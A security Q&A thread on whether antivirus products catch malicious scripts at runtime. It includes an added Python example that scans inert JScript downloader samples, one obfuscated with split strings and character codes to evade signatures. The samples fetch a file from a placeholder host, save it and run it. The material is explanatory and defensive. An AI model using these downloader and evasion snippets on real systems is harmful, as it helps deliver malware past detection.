Are malicious scripts (.js, .wsf, VBA macros) scanned at runtime? I noticed that if a malicious script is not detected at scan time it won't be detected at runtime either; only the downloaded file can be detected. All these scripts download a file from the internet and start it, so I'm wondering whether this behaviour is detected at runtime, or whether AVs wait for the downloaded file to be executed and then check whether that file is malicious. I suppose that not all files are detected at scan time.
1 Answer
Virus scanners (in general) hook into the filesystem. This means whenever a file is transferred it passes through the virus scanner, which tries a table of commonly known patterns (aka definitions) against the file. This works well for binary files, as patterns are easier to detect in static content. Patterns are not the only assessment; for example, Windows Defender traces routines to see where they lead. A combination of system calls can also trigger an alert. Windows host scripts (e.g. js, vba, vs) are well known to cause problems, and are scanned in various ways to ensure they cannot cause harm (or unintended actions). Malware scanners have various ways of detecting threats; these are only two of them.
If you were to download a random, malicious Python script that has been slightly altered to cover its purpose, chances are it will go unnoticed.
Executables are also checked before they are loaded into executable memory. Of course, options and techniques vary per product.
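The two passes the answer describes, a definitions table run over a file and a behavioural check of what the script can do, as an added Python example that is not part of the original answer. The signature names, the capability table and the three sample scripts are all constructed for this illustration; the samples are inert text that is only scanned, never executed. It shows why a slightly altered script slips past exact patterns while its fetch-then-execute behaviour is still visible once split-up string literals are folded back together.

```python
import re

# Constructed, inert sample scripts (added example; not from the original post).
# They are only ever treated as text to scan and are never executed.
PLAIN_DOWNLOADER = r'''
var http = new ActiveXObject("MSXML2.XMLHTTP");
http.open("GET", "http://example.invalid/payload.bin", false);
http.send();
var s = new ActiveXObject("ADODB.Stream");
s.Type = 1; s.Open(); s.Write(http.responseBody);
s.SaveToFile("C:\\Users\\Public\\payload.exe", 2);
new ActiveXObject("WScript.Shell").Run("C:\\Users\\Public\\payload.exe");
'''

# Same behaviour, with the literals a definition would key on split into
# pieces and one of them built from character codes at runtime.
OBFUSCATED_DOWNLOADER = r'''
var http = new ActiveXObject("MSX" + "ML2.XM" + "LHTTP");
http.open("GET", "http://example.invalid/payload.bin", false);
http.send();
var s = new ActiveXObject("ADO" + "DB.Str" + "eam");
s.Type = 1; s.Open(); s.Write(http.responseBody);
s.SaveToFile("C:\\Users\\Public\\payload.exe", 2);
var sh = String.fromCharCode(87,83,99,114,105,112,116,46,83,104,101,108,108);
new ActiveXObject(sh).Run("C:\\Users\\Public\\payload.exe");
'''

# Harmless script: writes a local text file, no network access, no process launch.
BENIGN = r'''
var s = new ActiveXObject("ADODB.Stream");
s.Type = 2; s.Open(); s.WriteText("hello");
s.SaveToFile("C:\\Users\\Public\\note.txt", 2);
'''

# Hypothetical "definitions": exact substrings, as a pattern table would hold them.
SIGNATURES = {
    "JS/Downloader.gen!xmlhttp": 'new ActiveXObject("MSXML2.XMLHTTP")',
    "JS/Downloader.gen!shellrun": 'new ActiveXObject("WScript.Shell").Run(',
}

# Capability markers for the behavioural heuristic (hypothetical table): a script
# that can fetch, write to disk and launch a process looks like a downloader
# whatever its exact text.
CAPABILITIES = {
    "network": ("MSXML2.XMLHTTP", "WinHttp.WinHttpRequest"),
    "file_write": ("ADODB.Stream", "SaveToFile"),
    "exec": ("WScript.Shell", ".Run(", ".Exec("),
}

_CHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
_CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')


def scan_static(script: str) -> list:
    """Signature pass: report every definition whose pattern occurs verbatim."""
    return [name for name, pattern in SIGNATURES.items() if pattern in script]


def normalize(script: str) -> str:
    """Cheap stand-in for script emulation: decode fromCharCode() calls and
    fold "a" + "b" concatenations so split-up literals become whole again."""
    script = _CHARCODE.sub(
        lambda m: '"' + "".join(chr(int(c)) for c in m.group(1).split(",")) + '"',
        script,
    )
    previous = None
    while previous != script:  # repeat until no adjacent literals remain
        previous = script
        script = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', script)
    return script


def capabilities(script: str) -> list:
    """Behavioural pass: which capability classes does the normalized script use?"""
    text = normalize(script)
    return sorted(cap for cap, markers in CAPABILITIES.items()
                  if any(marker in text for marker in markers))


def scan(script: str) -> dict:
    """Definitions first, then a behaviour-based verdict for what they miss."""
    sigs = scan_static(script)
    caps = capabilities(script)
    if sigs:
        verdict = "known-malicious"
    elif {"network", "file_write", "exec"} <= set(caps):
        verdict = "suspicious-downloader"
    else:
        verdict = "clean"
    return {"signatures": sigs, "capabilities": caps, "verdict": verdict}


if __name__ == "__main__":
    for label, sample in [("plain", PLAIN_DOWNLOADER),
                          ("obfuscated", OBFUSCATED_DOWNLOADER),
                          ("benign", BENIGN)]:
        print(label, scan(sample))
```

The plain sample hits both definitions; the obfuscated one hits none, because the exact bytes are no longer there. After `normalize()` the `MSXML2.XMLHTTP` literal is whole again, but the shell-run pattern still does not match, since the object name now travels through a variable; only the capability check, which does not care how the string was assembled, still flags it. The benign script has file-write capability alone and stays clean, which is the distinction a pure "ADODB.Stream" substring rule would get wrong.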
- I noticed that if a malicious script is not detected at scan time it won't be detected at runtime either; only the downloaded file can be detected. Do you think that is true? – William Caman Sep 03 '16 at 09:42
- @WilliamCaman You might want to add that to the post. How accurate malware scanners are depends on their techniques. Not all methods are widely known or used, as this is the trade secret of an antivirus company. There is no saying whether your example is *always* true, but it can happen that something slips through. – Yorick de Wid Sep 03 '16 at 09:45